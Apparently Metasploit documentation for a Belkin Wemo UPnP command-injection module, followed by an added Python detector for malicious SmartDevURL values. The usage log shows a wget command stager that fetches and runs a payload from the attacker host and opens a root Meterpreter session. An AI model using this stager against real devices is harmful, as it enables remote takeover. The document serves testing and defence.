## Introduction

This module exploits a command injection in the Belkin Wemo UPnP API via the `SmartDevURL` argument to the `SetSmartDevInfo` action.

This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo devices are known to be affected, albeit on a different `RPORT` (49153).

## Setup

You may buy the device on Amazon.

## Targets

```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Options

**RPORT**

Set this to the Wemo device's UPnP port. In our testing, this was 49152 for Crock-Pot and 49153 for other devices.

## Usage

```
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run

[*] Started reverse TCP handler on 10.22.22.4:4444
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[+] Firmware version 2.00.6461 < 2.00.8643
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
[*] Sending payload to 10.22.22.1 (Wget)
[*] Transmitting intermediate stager...(164 bytes)
[*] Sending stage (1252312 bytes) to 10.22.22.1
[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.22.22.1
OS           : (Linux 2.6.21)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >
```
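
## Detection example

A defender-side check for the request described in the Introduction, as an added example that is not part of the Metasploit module or its documentation: it inspects HTTP bodies sent to the Wemo UPnP ports and flags `SetSmartDevInfo` calls whose `SmartDevURL` is not a plain URL. The character allowlist, the `inspect_request` and `soap_body` helpers, the placeholder service URN and the sample values are assumptions constructed for illustration.

```python
import html
import re

# Ports the page reports for the Wemo UPnP service.
WEMO_UPNP_PORTS = {49152, 49153}

# Assumption: a legitimate SmartDevURL is a plain http(s) URL built only from
# these characters. Anything else (";", spaces, quotes, "$", "|", ...) is flagged.
ALLOWED_CHAR = re.compile(r"[A-Za-z0-9._~:/?#&=%+\-]")
SAFE_URL = re.compile(r"https?://[A-Za-z0-9._~:/?#&=%+\-]+")
ARG_RE = re.compile(r"<SmartDevURL>(.*?)</SmartDevURL>", re.DOTALL)


def inspect_request(dst_port, body):
    """Return [(value, offending_chars)] for suspicious SmartDevURL arguments."""
    if dst_port not in WEMO_UPNP_PORTS or "SetSmartDevInfo" not in body:
        return []
    findings = []
    for raw in ARG_RE.findall(body):
        # Decode XML entities first so "&#59;" cannot hide a ";".
        value = html.unescape(raw).strip()
        if not SAFE_URL.fullmatch(value):
            bad = sorted({c for c in value if not ALLOWED_CHAR.fullmatch(c)})
            findings.append((value, bad))
    return findings


def soap_body(smart_dev_url):
    """Build a constructed request body; the service URN is a placeholder."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:SetSmartDevInfo xmlns:u="urn:placeholder:service:example:1">'
        f"<SmartDevURL>{smart_dev_url}</SmartDevURL>"
        "</u:SetSmartDevInfo></s:Body></s:Envelope>"
    )


# Constructed samples (192.0.2.0/24 is a documentation range); not working payloads.
BENIGN = soap_body("http://192.0.2.10:8080/setup.xml?id=1&amp;v=2")
SUSPICIOUS = soap_body("http://192.0.2.10/info.xml; echo constructed-sample")
ENCODED = soap_body("http://192.0.2.10/info.xml&#59; echo constructed-sample")

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("suspicious", SUSPICIOUS), ("encoded", ENCODED)]:
        print(name, inspect_request(49152, body))
```

The entity-encoded sample produces the same finding as the plain one because the value is decoded before it is validated.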